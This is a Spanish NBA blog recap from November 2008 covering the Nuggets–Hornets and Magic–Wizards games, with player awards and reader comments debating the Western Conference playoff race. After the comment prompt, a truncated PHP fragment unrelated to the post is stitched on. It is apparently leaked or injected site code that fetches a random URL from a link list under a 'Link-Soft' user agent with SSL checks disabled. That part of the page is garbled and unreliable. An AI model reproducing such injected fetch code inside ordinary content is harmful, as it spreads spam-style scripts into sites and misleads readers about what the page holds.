La Crónica (27/11/08): “ThanksGiving Day”

28 de November de 2008 por MagicJohnson32

Partidazo en el Pepsi Center de Denver, donde los Nuggets se están mostrando verdaderamente duros de pelar. Llegaban los Hornets sin Chandler (que se asistió al nacimiento de su hijo) y sin Peterson, pero con ganas de recuperar su lugar en el Oeste y dejar claro que son ellos los terceros en discordia junto a Lakers y Suns, tras las dudas mostradas hasta la fecha.

El caso es que finalmente el duelo ha cumplido con las expectativas, quizás hasta demasiado en un partido que Hornets no ha llegado a controlar en ningún momento y que se ha decidido en el último minuto con un triplazo de Posey. Con todo, han salido vivos gracias, entre otras cosas, al gran trabajo de Melvin Ely, que forzando su vuelta tras su lesión, ha llegado a anular a Nené. Carmelo, con inusitada eficacia y, sobre todo, JR Smith han llevado el juego a su terreno, pero si estos Hornets no defienden como antaño sí se ven algo más cómodos que antes en los altos guarismos y se han llevado su séptima victoria de siete ocasiones en los que han superado la centena de puntos. George Karl se ha quejado amargamente al final de la cantidad de posesiones que ha habido en los últimos dos minutos. No sé de qué se sorprende, la verdad.

Los que siguen como cohetes son Orlando, que con un partido cumplidor de su quinteto les sobró para darle el primer disgusto (que no el último) a Tapscott. Pero no todo son buenas noticias para ellos, ya que durante la última semana vienen sufriendo ciertos quebraderos de cabeza con las lesiones. A la ya conocida de Bogans se unió anoche la de Jameer Nelson, y con eso el backcourt se les queda en cuadro. Al menos han recuperado a Battie, que está cumpliendo bien tras su vuelta.

CONCLUSIONES

Es curioso: este año ya no se especula con que los Wizards jueguen mejor sin Arenas que con él.

– Atención, noticia: el de anoche fue el segundo partido seguido de Dwight Howard anotando más del 70% de sus tiros libres y el octavo consecutivo con al menos un 50%. Parece que la kriptonita ha dejado de hacer efecto.

– Si alguien tenía alguna duda de para qué han fichado a Posey los Hornets, ahí está una muestra.

– Conocemos a JR Smith; sabemos que no es precisamente el jugador en cuyas manos dejaríamos las riendas de una franquicia. Pero, Mr. Karl, ¿es realmente necesario mantener a Dahntay Jones de escolta titular?

PREMIOS

MVP: No fue de sus mayores exhibiciones pero Chris Paul resultó dominante cuando tenía que serlo para la victoria de los Hornets en Denver. Tras anotar sólo 9 puntos en los tres primeros cuartos, tomó el control del partido en el último, en el que metió 13. Al final logró su décima actuación de al menos 20 puntos y 10 asistencias en catorce partidos disputados.

El rookie: Únicamente dos novatos saltaron al parquet en los partidos de anoche. Courtney Lee logró 5 puntos, 2 rebotes y 1 asistencia en 11 minutos, mientras que JaVale McGee fue titular en los Wizards y consiguió 6 puntos, 7 rebotes, 1 robo y 1 tapón en 16 minutos.

La sorpresa: Tras ser castigado por George Karl por llegar tarde al entrenamiento y no jugar ni un segundo en el partido anterior, JR Smith sacó a relucir su talento anoche e hizo uno de esos partidos que de tanto en tanto protagoniza. Ante los Hornets consiguió 32 puntos en 32 minutos, con 13 de 21 en tiros de campo incluídos 5 de 9 en triples, además de 5 rebotes, 4 asistencias y 2 robos.

La decepción: Viene siendo una constante pero no por ello deja de ser grave la ridícula aportación del backcourt titular de los Wizards. Anoche, por octava ocasión consecutivas, la anotación conjunta de los dos guards titulares no alcanzó los 15 puntos (entre Stevenson y Dee Brown anotaron 8 puntos).

El mayor esfuerzo en vano: Al margen de los 32 puntos sin recompensa de JR Smith, hay que destacar a Butler & Jamison, que prácticamente siempre dan la cara y a los que no se puede culpar de los malos resultados de los Wizards. Anoche entre ambos lograron 42 puntos, 14 rebotes y 8 asistencias.

La pregunta del día: Los ocho primeros puestos del Oeste están, tras un mes de competición, ocupados por Lakers, Suns, Nuggets, Rockets, Jazz, Blazers, Hornets y Spurs. ¿Piensas que serán éstos los equipos que finalmente disputen los Playoffs en el Oeste?

Comenta

7 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Sin lugar a dudas sí.

    Si ayer puteaba a Kantonyo por su pronóstico de los Cavs… yo debería hacer lo propio con el mío de Denver.

    Ahora, que Viva en el debate Houston-Clippers se cubrió de gloria… XD XD XD

      Citar

  2. Kantonyo dice:
    #2

    Yo como mucho daria alguna posibilidad todavia a Dallas, sobre todo despues de sus ultimos partidos. Y tenemos que ver como reacciona Clippers al fichaje de Zach. A un quinteto Baron Davis, Eric Gordon, Al Thornton, Zach Randolph y Chris Kaman (Camby) no se le puede enterrar tan pronto.

      Citar

  3. MagicJohnson32 dice:
    #3

    Sí, yo todavía creo en los Mavs. Es evidente que no tienen plantilla para ganar el anillo, pero hombre, Kidd-Terry-Howard-Dirk dan para Playoffs.

      Citar

  4. TheDeerHunter dice:
    #4

    uolá!!! había olvidado a Dallas!!!

    Pues sí, entre esos que habeis dicho y Dallas está el pescao vendido (los clippers yo sí los descarto ya)

    Contrapregunta: Suponiendo que Dallas lo lograra ¿quien se caería de esos 8???

      Citar

  5. MagicJohnson32 dice:
    #5

    Las mayores dudas, Mavs al margen, me las generan los Nuggets y los Blazers. Denver va a necesitar a un muy buen (y muy sano) Nene, además de que JR y Kleiza han de mejorar su pésimo inicio (pese al partidazo de Smith anoche). A los Blazers les puede pasar lo del año pasado. Vale que ahora tienen a Rudy y a Oden, pero aun así les falta solidez.

      Citar

  6. jldelpozo dice:
    #6

    Hola a todos.

    A mi Mavs no me convence este año. Pinta a reconstruccion. Se equivocaron con lo de Kidd y Devin Harris.
    Coincido con MAGIC JOHNSON32. Nuggets me genera dudas. Han acertado con Billups y Carmelo ha mejorado mucho, pero les falta un jugador dominante en la pintura. Nene no lo puede hacer todo y Martin nunca fue de mi agrado. Me gustan mas los Blazers. Les veo solidos en casa y capaz de dar la sorpresa fuera.

    ¿Por cierto, que opinais de los KNICKS?

      Citar

  7. Viva_Dirk dice:
    #7

    Lo primero gracias por dejar comentarios JL. Ahora las respuestas:

    – Yo sigo pensando que los que se quedan fuera son los Rockets, y entran los Mavs. Y los Clippers darán guerra, y como despidan a Dunleavy mucho cuidado con ellos.

    – Los Knicks están haciendo lo que deben, quitarse contratos grandes, manteniendo jugadores como Wilson Chandler, Gallinari(aunque no halla jugado), etc. No se si será Lebron, pero con toda la pasta que parece que tendrán ese año, el atractivo de la franquicia y D’Antoni en el banco, pueden volver los buenos tiempos para los de la gran manzana.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>